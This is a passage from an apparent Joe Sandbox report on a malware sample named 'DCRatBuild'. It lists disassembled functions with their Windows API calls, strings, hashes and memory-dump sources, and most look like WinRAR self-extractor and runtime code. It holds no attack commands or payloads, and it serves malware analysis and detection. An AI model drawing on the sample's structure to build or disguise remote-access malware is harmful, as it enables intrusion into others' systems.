                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                                      • String ID: %s%s%u
                                      • API String ID: 2892007947-1360425832
                                      • Opcode ID: d15e9c01b995f5913de87782768d2fc4e5ad5b3a6a209a3f56c77aebc498d483
                                      • Instruction ID: caa766fdf6d0e7742c792d78019b90700f9ff9751520c8f291a285dc2396644d
                                      • Opcode Fuzzy Hash: d15e9c01b995f5913de87782768d2fc4e5ad5b3a6a209a3f56c77aebc498d483
                                      • Instruction Fuzzy Hash: 0B41C371D4061CAADB26DBA0CC45EDA77BDEF09711F0040A6E909E60A0E7799BC4EF90
                                      Function 00F18E62 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 125memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00F18F38
                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00F18F59
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AllocByteCharGlobalMultiWide
                                      • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                      • API String ID: 3286310052-4209811716
                                      • Opcode ID: 378c46b4f71d7b5fb2ac69c7516b6c6157a5a960b8bf2a750bd167e07969255e
                                      • Instruction ID: f8466fcbb1309224b818f95516072b2c1406b2c87e525bf1af3122607ca09ef5
                                      • Opcode Fuzzy Hash: 378c46b4f71d7b5fb2ac69c7516b6c6157a5a960b8bf2a750bd167e07969255e
                                      • Instruction Fuzzy Hash: 49311C319083156BD714BB70AC03FEF7759DF51770F140519F801961C1DF68E94AA3A6
                                      Function 00F19635 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108COMMON
                                      Download Yara Rule
                                      APIs
                                      • ShowWindow.USER32(?,00000000), ref: 00F1964E
                                      • GetWindowRect.USER32(?,00000000), ref: 00F19693
                                      • ShowWindow.USER32(?,00000005,00000000), ref: 00F1972A
                                      • SetWindowTextW.USER32(?,00000000), ref: 00F19732
                                      • ShowWindow.USER32(00000000,00000005), ref: 00F19748
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: Window$Show$RectText
                                      • String ID: RarHtmlClassName
                                      • API String ID: 3937224194-1658105358
                                      • Opcode ID: eb5e91535789401a91a2d60c91731b52ff648ad85c8f039dd6bccce80c36572d
                                      • Instruction ID: 38a03806664a97e1969aa04a4d31e3ae2675d50a3d3e730c5c3ea9b1a17eadd6
                                      • Opcode Fuzzy Hash: eb5e91535789401a91a2d60c91731b52ff648ad85c8f039dd6bccce80c36572d
                                      • Instruction Fuzzy Hash: 5431F332408314EFDB519F60DC48BABBBA8FF09711F004559FE59961A2CBB4D844EFA1
                                      Function 00F2BFB5 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00F2BF79: _free.LIBCMT ref: 00F2BFA2
                                      • _free.LIBCMT ref: 00F2C003
                                        • Part of subcall function 00F284DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00F2BFA7,00F33958,00000000,00F33958,00000000,?,00F2BFCE,00F33958,00000007,00F33958,?,00F2C3CB,00F33958), ref: 00F284F4
                                        • Part of subcall function 00F284DE: GetLastError.KERNEL32(00F33958,?,00F2BFA7,00F33958,00000000,00F33958,00000000,?,00F2BFCE,00F33958,00000007,00F33958,?,00F2C3CB,00F33958,00F33958), ref: 00F28506
                                      • _free.LIBCMT ref: 00F2C00E
                                      • _free.LIBCMT ref: 00F2C019
                                      • _free.LIBCMT ref: 00F2C06D
                                      • _free.LIBCMT ref: 00F2C078
                                      • _free.LIBCMT ref: 00F2C083
                                      • _free.LIBCMT ref: 00F2C08E
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                                      • Instruction ID: 21eac22b522d3dfa9602996f4056fa4e64c6fe4ea786bc5478b275d29be36b19
                                      • Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                                      • Instruction Fuzzy Hash: 0E117231541B24F6D620FBF0DD07FCBB79D6F04700F408854BB9A66452DB68F905BA91
                                      Function 00F220CA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(?,?,00F220C1,00F1FB12), ref: 00F220D8
                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F220E6
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F220FF
                                      • SetLastError.KERNEL32(00000000,?,00F220C1,00F1FB12), ref: 00F22151
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: ErrorLastValue___vcrt_
                                      • String ID:
                                      • API String ID: 3852720340-0
                                      • Opcode ID: 187358efe3e8d5dc0ae9892abcbcf6261e6c49d28d7fec1091f39f580ca6e447
                                      • Instruction ID: 756c128ac1dccb9662ae1dadc0a5ae074575ad23344e6710553aa17db26de1d6
                                      • Opcode Fuzzy Hash: 187358efe3e8d5dc0ae9892abcbcf6261e6c49d28d7fec1091f39f580ca6e447
                                      • Instruction Fuzzy Hash: AE0147326197357FF7A46BB47C86B2A3B49EF117743210629F310940F0EF194D11B100
                                      Function 00F1DC9A Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                      • API String ID: 0-1718035505
                                      • Opcode ID: d7205adb81f27313d459e1869c53037d3c5279cf55e8fca68ce2c42b6eb57a61
                                      • Instruction ID: 40b832d3342b3ad2ec4216ec6f53afc1cbb6786727e5e9828366ce726b9a18a0
                                      • Opcode Fuzzy Hash: d7205adb81f27313d459e1869c53037d3c5279cf55e8fca68ce2c42b6eb57a61
                                      • Instruction Fuzzy Hash: 3B01C8B1B417225BCF249FB4AC956E733F8AA817763305A3AE501D7240EE91C8C1F6E0
                                      Function 00F10CBE Relevance: 9.1, APIs: 6, Instructions: 94timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F10D0D
                                        • Part of subcall function 00F0ACF5: GetVersionExW.KERNEL32(?), ref: 00F0AD1A
                                      • LocalFileTimeToFileTime.KERNEL32(?,00F10CB8), ref: 00F10D31
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F10D47
                                      • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00F10D56
                                      • SystemTimeToFileTime.KERNEL32(?,00F10CB8), ref: 00F10D64
                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F10D72
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: Time$File$System$Local$SpecificVersion
                                      • String ID:
                                      • API String ID: 2092733347-0
                                      • Opcode ID: 2afac5584afa86d944746eea1c697c46974b5fa319ca149bb31a748f8bc9d573
                                      • Instruction ID: a73a46d8b081cf342a924ac815c3782a17a57ee6c2efda1f73757310d167dab5
                                      • Opcode Fuzzy Hash: 2afac5584afa86d944746eea1c697c46974b5fa319ca149bb31a748f8bc9d573
                                      • Instruction Fuzzy Hash: C031D87A90020DEBCB04DFE4D8859EFBBB9FF58710B04455AE955E3210EB309685DB64
                                      Function 00F191B0 Relevance: 9.1, APIs: 6, Instructions: 89COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: _memcmp
                                      • String ID:
                                      • API String ID: 2931989736-0
                                      • Opcode ID: 9b407cef15b3399a2796ce8bfb981a7663acf98dd1ab351f9e1f2a1c781f5902
                                      • Instruction ID: 8672f45bc3b6d4767fd07a7846fcd1a90fe001713e48d1c07a3bb0c0a716f4c8
                                      • Opcode Fuzzy Hash: 9b407cef15b3399a2796ce8bfb981a7663acf98dd1ab351f9e1f2a1c781f5902
                                      • Instruction Fuzzy Hash: FA218B7160810EBBD7099E14DC51FBB77ADDB90764F148524FC0997201E2B4EDC576D1
                                      Function 00F28FA5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(?,00F40EE8,00F23E14,00F40EE8,?,?,00F23713,00000050,?,00F40EE8,00000200), ref: 00F28FA9
                                      • _free.LIBCMT ref: 00F28FDC
                                      • _free.LIBCMT ref: 00F29004
                                      • SetLastError.KERNEL32(00000000,?,00F40EE8,00000200), ref: 00F29011
                                      • SetLastError.KERNEL32(00000000,?,00F40EE8,00000200), ref: 00F2901D
                                      • _abort.LIBCMT ref: 00F29023
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: ErrorLast$_free$_abort
                                      • String ID:
                                      • API String ID: 3160817290-0
                                      • Opcode ID: 25375fe78037e46225bec284756341809a57ac51a55d72029e544a51f7a0129d
                                      • Instruction ID: 402bf85b41f09473fbe32be16690949aac07d0f63c4029ccec660d08145c8a51
                                      • Opcode Fuzzy Hash: 25375fe78037e46225bec284756341809a57ac51a55d72029e544a51f7a0129d
                                      • Instruction Fuzzy Hash: 8AF0F47290AA356BC212B3787D0AB2B3A5A9FD07B0F250014F515E3292EF28C9037011
                                      Function 00F1D2E6 Relevance: 9.0, APIs: 6, Instructions: 43windowsynchronizationCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00F1D2F2
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00F1D30C
                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F1D31D
                                      • TranslateMessage.USER32(?), ref: 00F1D327
                                      • DispatchMessageW.USER32(?), ref: 00F1D331
                                      • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00F1D33C
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                      • String ID:
                                      • API String ID: 2148572870-0
                                      • Opcode ID: 795bc0230b71d384f17d8335408972229702970a09204e5871b447acdc4a5afb
                                      • Instruction ID: f1848aca45a9fc13bd6f24ecd9427b3760ee6c75a1880df28dca23235f9aa985
                                      • Opcode Fuzzy Hash: 795bc0230b71d384f17d8335408972229702970a09204e5871b447acdc4a5afb
                                      • Instruction Fuzzy Hash: 64F03C72E0151DBBCB219BA1DC4CEDBBF7EEF523A1F008012F616D2050D6758581D7A1
                                      Function 00F1C40E Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                      Download Yara Rule
                                      APIs
                                      • _wcschr.LIBVCRUNTIME ref: 00F1C435
                                        • Part of subcall function 00F117AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00F0BB05,00000000,.exe,?,?,00000800,?,?,00F185DF,?), ref: 00F117C2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: CompareString_wcschr
                                      • String ID: <$HIDE$MAX$MIN
                                      • API String ID: 2548945186-3358265660
                                      • Opcode ID: 218f1d114cc31cabcc1b894995bd9f14cb5e0670b1a7227c76cb962be973124f
                                      • Instruction ID: c10a6d120945c4e2f9fa574334862f5ac3da1104e56ebad5e82348358c3a648d
                                      • Opcode Fuzzy Hash: 218f1d114cc31cabcc1b894995bd9f14cb5e0670b1a7227c76cb962be973124f
                                      • Instruction Fuzzy Hash: F7318172D44209AADB21DA94DC51FEB77BCEF54720F0041A6FA05D6090EBB8DEC4EA90
                                      Function 00F1ADED Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadBitmapW.USER32(00000065), ref: 00F1ADFD
                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 00F1AE22
                                      • DeleteObject.GDI32(00000000), ref: 00F1AE54
                                      • DeleteObject.GDI32(00000000), ref: 00F1AE77
                                        • Part of subcall function 00F19E1C: FindResourceW.KERNEL32(00F1AE4D,PNG,?,?,?,00F1AE4D,00000066), ref: 00F19E2E
                                        • Part of subcall function 00F19E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,00F1AE4D,00000066), ref: 00F19E46
                                        • Part of subcall function 00F19E1C: LoadResource.KERNEL32(00000000,?,?,?,00F1AE4D,00000066), ref: 00F19E59
                                        • Part of subcall function 00F19E1C: LockResource.KERNEL32(00000000,?,?,?,00F1AE4D,00000066), ref: 00F19E64
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                                      • String ID: ]
                                      • API String ID: 142272564-3352871620
                                      • Opcode ID: 82c0a198f1789f29b7c305d075f9f39418356d27c7aa2307ef0a9224e03af1b8
                                      • Instruction ID: 25641462c192ac941d3ac6ee8aff821cca39527a246c0bb97cf3d497704850d4
                                      • Opcode Fuzzy Hash: 82c0a198f1789f29b7c305d075f9f39418356d27c7aa2307ef0a9224e03af1b8
                                      • Instruction Fuzzy Hash: 5A016636941619B7C7102765AC15AFF7B79AF81B21F080014FD00A7291CFB58C65B7F2
                                      Function 00F1CC90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00F0130B: GetDlgItem.USER32(00000000,00003021), ref: 00F0134F
                                        • Part of subcall function 00F0130B: SetWindowTextW.USER32(00000000,00F335B4), ref: 00F01365
                                      • EndDialog.USER32(?,00000001), ref: 00F1CCDB
                                      • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00F1CCF1
                                      • SetDlgItemTextW.USER32(?,00000066,?), ref: 00F1CD05
                                      • SetDlgItemTextW.USER32(?,00000068), ref: 00F1CD14
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: ItemText$DialogWindow
                                      • String ID: RENAMEDLG
                                      • API String ID: 445417207-3299779563
                                      • Opcode ID: 5a9ea724dd532beca4bf0e47987e270bb5d0bd14dafa6840730f075f447f21c8
                                      • Instruction ID: c7b49a82fe019f32488f185e33e0c3c5e1d15070501513a5e561961c098a9d92
                                      • Opcode Fuzzy Hash: 5a9ea724dd532beca4bf0e47987e270bb5d0bd14dafa6840730f075f447f21c8
                                      • Instruction Fuzzy Hash: 2701F5337C43157AD1114B64AC09FAB7B9CAB5AB52F100410F346A20E0C6A2A944F7E6
                                      Function 00F275C2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00F27573,00000000,?,00F27513,00000000,00F3BAD8,0000000C,00F2766A,00000000,00000002), ref: 00F275E2
                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00F275F5
                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00F27573,00000000,?,00F27513,00000000,00F3BAD8,0000000C,00F2766A,00000000,00000002), ref: 00F27618
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AddressFreeHandleLibraryModuleProc
                                      • String ID: CorExitProcess$mscoree.dll
                                      • API String ID: 4061214504-1276376045
                                      • Opcode ID: 57f69f17b0c85738a2bd566b3403a1d688e625e146310fff44285f7bdee440f2
                                      • Instruction ID: 7bc9379dc5f8b6b3edfb13f18245bc5079b7151f3f43e599859661d04b3af94b
                                      • Opcode Fuzzy Hash: 57f69f17b0c85738a2bd566b3403a1d688e625e146310fff44285f7bdee440f2
                                      • Instruction Fuzzy Hash: C0F0AF30A1861CBBCB15ABA4DC09B9EBFBAEF04735F000068F805A6150DB709A80EA90
                                      Function 00F0EB73 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00F10085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00F100A0
                                        • Part of subcall function 00F10085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00F0EB86,Crypt32.dll,00000000,00F0EC0A,?,?,00F0EBEC,?,?,?), ref: 00F100C2
                                      • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00F0EB92
                                      • GetProcAddress.KERNEL32(00F481C0,CryptUnprotectMemory), ref: 00F0EBA2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AddressProc$DirectoryLibraryLoadSystem
                                      • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                      • API String ID: 2141747552-1753850145
                                      • Opcode ID: 5d341394b37e54c3be0d152c05e610d0f0c97c2b6db2031fe0368800714f6b8c
